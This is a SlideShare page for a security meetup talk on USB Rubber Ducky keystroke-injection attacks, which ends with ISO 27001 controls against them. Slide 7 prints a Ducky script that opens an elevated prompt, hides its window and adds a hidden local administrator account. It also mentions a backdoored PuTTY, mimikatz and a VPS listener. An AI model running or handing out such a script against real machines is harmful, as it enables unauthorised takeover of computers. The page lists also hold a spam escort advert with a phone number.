Submit Search
Upload
Removable Disk Hacking for Fun and Profit
•
2 likes
•
224 views
Rungga Reksya Sabilillah
Follow
Meetup #4 - IT Audit and IT Security Removable Disk Hacking for Fun and Profit
Read less
Read more
Technology
Slideshow view
Report
Share
Slideshow view
Report
Share
1 of 11
Download now
Download to read offline
Recommended
Gunadarma workshop security
Gunadarma workshop security
Rungga Reksya Sabilillah
How to assign a CVE to yourself?
How to assign a CVE to yourself?
Ramin Farajpour Cami
OWASP Mobile Top 10
OWASP Mobile Top 10
NowSecure
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
Security Innovation
Penetration and hacking training brief
Penetration and hacking training brief
Bill Nelson
Footprinting
Footprinting
prashant3535
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Sina Manavi
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
All Things Open
Recommended
Gunadarma workshop security
Gunadarma workshop security
Rungga Reksya Sabilillah
How to assign a CVE to yourself?
How to assign a CVE to yourself?
Ramin Farajpour Cami
OWASP Mobile Top 10
OWASP Mobile Top 10
NowSecure
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
Security Innovation
Penetration and hacking training brief
Penetration and hacking training brief
Bill Nelson
Footprinting
Footprinting
prashant3535
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Sina Manavi
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
All Things Open
Ethical hacking
Ethical hacking
Anumadil1
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
Prathan Phongthiproek
OWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-Dive
Prathan Phongthiproek
Owasp mobile top 10
Owasp mobile top 10
Pawel Rzepa
Penetration Testing Basics
Penetration Testing Basics
Rick Wanner
DON'T Use Two-Factor Authentication...Unless You Need It!
DON'T Use Two-Factor Authentication...Unless You Need It!
Priyanka Aash
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration Testing
Prathan Phongthiproek
Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8
5h1vang
Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
Prathan Phongthiproek
Network software gotovaya
Network software gotovaya
Vlad Demensky
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Anant Shrivastava
Addressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using Xamarin
Alec Tucker
OWASP Top 10 for Mobile
OWASP Top 10 for Mobile
Appvigil - Mobile App Security Scanner
OWASP Mobile TOP 10 2014
OWASP Mobile TOP 10 2014
Islam Azeddine Mennouchi
Hacking Cracking 2008
Hacking Cracking 2008
Jim Geovedi
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
Analysis of RSA Lockheed Martin Attack
Analysis of RSA Lockheed Martin Attack
Gavin Davey
black hat deephish
black hat deephish
Alejandro Correa Bahnsen, PhD
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
ecmee
How to find Zero day vulnerabilities
How to find Zero day vulnerabilities
Mohammed A. Imran
Password cracking and brute force tools
Password cracking and brute force tools
zeus7856
Learn Hacking With Gflixacademy
Learn Hacking With Gflixacademy
Gaurav Mishra
More Related Content
What's hot
Ethical hacking
Ethical hacking
Anumadil1
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
Prathan Phongthiproek
OWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-Dive
Prathan Phongthiproek
Owasp mobile top 10
Owasp mobile top 10
Pawel Rzepa
Penetration Testing Basics
Penetration Testing Basics
Rick Wanner
DON'T Use Two-Factor Authentication...Unless You Need It!
DON'T Use Two-Factor Authentication...Unless You Need It!
Priyanka Aash
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration Testing
Prathan Phongthiproek
Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8
5h1vang
Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
Prathan Phongthiproek
Network software gotovaya
Network software gotovaya
Vlad Demensky
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Anant Shrivastava
Addressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using Xamarin
Alec Tucker
OWASP Top 10 for Mobile
OWASP Top 10 for Mobile
Appvigil - Mobile App Security Scanner
OWASP Mobile TOP 10 2014
OWASP Mobile TOP 10 2014
Islam Azeddine Mennouchi
Hacking Cracking 2008
Hacking Cracking 2008
Jim Geovedi
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
Analysis of RSA Lockheed Martin Attack
Analysis of RSA Lockheed Martin Attack
Gavin Davey
black hat deephish
black hat deephish
Alejandro Correa Bahnsen, PhD
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
ecmee
How to find Zero day vulnerabilities
How to find Zero day vulnerabilities
Mohammed A. Imran
What's hot
(20)
Ethical hacking
Ethical hacking
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
OWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-Dive
Owasp mobile top 10
Owasp mobile top 10
Penetration Testing Basics
Penetration Testing Basics
DON'T Use Two-Factor Authentication...Unless You Need It!
DON'T Use Two-Factor Authentication...Unless You Need It!
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration Testing
Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8
Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
Network software gotovaya
Network software gotovaya
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Addressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using Xamarin
OWASP Top 10 for Mobile
OWASP Top 10 for Mobile
OWASP Mobile TOP 10 2014
OWASP Mobile TOP 10 2014
Hacking Cracking 2008
Hacking Cracking 2008
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Analysis of RSA Lockheed Martin Attack
Analysis of RSA Lockheed Martin Attack
black hat deephish
black hat deephish
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
How to find Zero day vulnerabilities
How to find Zero day vulnerabilities
Similar to Removable Disk Hacking for Fun and Profit
Password cracking and brute force tools
Password cracking and brute force tools
zeus7856
Learn Hacking With Gflixacademy
Learn Hacking With Gflixacademy
Gaurav Mishra
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Priyanka Aash
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Priyanka Aash
Lecture about network and host security to NII students
Lecture about network and host security to NII students
Akiumi Hasegawa
Hacking Presentation
Hacking Presentation
Animesh Behera
Ethical Hacking, Its relevance and Its Prospects
Ethical Hacking, Its relevance and Its Prospects
Rwik Kumar Dutta
Super1
Super1
neelakanteswarreddy
my new HACKING
my new HACKING
BABATUNDE OLANREWAJU GEORGE
Parag presentation on ethical hacking
Parag presentation on ethical hacking
parag101
Ethical hacking
Ethical hacking
Alapan Banerjee
E security and payment 2013-1
E security and payment 2013-1
Abdelfatah hegazy
Ethical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptx
FarhanaMariyam1
Web Application Security
Web Application Security
sudip pudasaini
Password Attack
Password Attack
Sina Manavi
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
viaForensics
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
Shivam Sahu
185
185
vivatechijri
Secureview 3
Secureview 3
Felipe Prado
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
Antonio Parata
Similar to Removable Disk Hacking for Fun and Profit
(20)
Password cracking and brute force tools
Password cracking and brute force tools
Learn Hacking With Gflixacademy
Learn Hacking With Gflixacademy
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Lecture about network and host security to NII students
Lecture about network and host security to NII students
Hacking Presentation
Hacking Presentation
Ethical Hacking, Its relevance and Its Prospects
Ethical Hacking, Its relevance and Its Prospects
Super1
Super1
my new HACKING
my new HACKING
Parag presentation on ethical hacking
Parag presentation on ethical hacking
Ethical hacking
Ethical hacking
E security and payment 2013-1
E security and payment 2013-1
Ethical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptx
Web Application Security
Web Application Security
Password Attack
Password Attack
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
185
185
Secureview 3
Secureview 3
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
Recently uploaded
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
apidays
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
Zilliz
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Edi Saputra
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
The Digital Insurer
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Deepika Singh
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Product Anonymous
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
jfdjdjcjdnsjd
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Rustici Software
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
Remote DBA Services
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Zilliz
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Bhuvaneswari Subramani
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
apidays
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Nanddeep Nachan
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
Recently uploaded
(20)
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Removable Disk Hacking for Fun and Profit
1.
Meetup #4 IT Audit and Security Removable Disk Hacking for Fun and Profit
2.
@rungga_reksya Incident Classification Patterns2015 Data Breach Investigations Report 2 831 Hacking – Use of stolen credentials 817 Hacking –
Use of backdoor 817 Social - Phishing 812 Malware – Spyware / Key Logger 40%Web App Attack Top 10 Threat action varieties within Web App Attack breaches, (n=879)
3.
Financial Gain What is Motivationfor Attack ? Intellectual Property Theft Disruption of Service Theft of Classified Data 32% 24% 10% Source: ISACA and RSA Conference Survey 2015 19% Theft of Personality Identifiable 11%
4.
Mr. Robot S01-E06 & Hacker Movie 2016
5.
5 The USB Rubber Ducky ($44.99) is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found at usbrubberducky.com. Quack! Source: https://github.com/hak5darren/USB-Rubber-Ducky Rubber Duck
6.
Ducky Script 6 Ducky Script syntax is simple. Each command resides on a new line and may have options follow. Commands are written in ALL CAPS, because ducks are loud and like to quack with pride. Most commands invoke keystrokes, key-combos or strings of text, while some offer delays or pauses. Below is a list of commands and their function, followed by some example usage. Note: In the tables below //n// represents a number and //Char// represents characters A-Z, a-z. REM: Similar to the REM command in Basic and other languages, lines beginning with REM will not be processed. REM is a comment. DELAY: creates a momentary pause in the ducky script. It is quite handy for creating a moment of pause between sequential commands that may take the target computer some time to process. DELAY time is specified in milliseconds from 1 to 10000. STRING: processes the text following taking special care to auto-shift. STRING can accept a single or multiple characters. Ducky Script is the language of the USB Rubber Ducky. Writing scripts for can be done from any common ascii
text editor such as Notepad, vi, emacs, nano, gedit, kedit, TextEdit, etc. Extended Commands: ENTER, BREAK, CAPSLOCK, DELETE, END, ESC, HOME, PRINTSCREEN, etc
7.
Rubber Duck Scriptfor Fun and Profit 7 REM Add user dulu DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER ALT SPACE DELAY 1000 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING net user miicas password.123 /add ENTER STRING net localgroup administrators miicas
/add ENTER My ScriptFake Putty https://www.offensive- security.com/metasploit- unleashed/backdooring-exe-files/ Mimikatz https://github.com/gentilkiwi /mimikatz Net User # net user miicas/add # net localgroup administrators miicas/add
8.
9.
General Flow Tested on Windows Server 2008 R2 and Attacker OS is Kali Linux 9 Deploy “puttyremote.exe” &“mimikatz.exe” put into “/var/www/html/” Create Payload in Rubber Duck Listen on VPS Social Engineering Success
10.
Rubber Duck How to Control ? 10 11.2.9 8.3.111.2.8 12.2 Unattended user equipment Protection from Malware Clear Screen Policy Mgmt. Media Removable
11.
Rungga Reksya Sabilillah, ST, MMSI LA ISO 27001, LA ISO 20000, LA ISO 22301, OSCP, CEH, ECSA, CND Thank YouFor Your Attention
Download now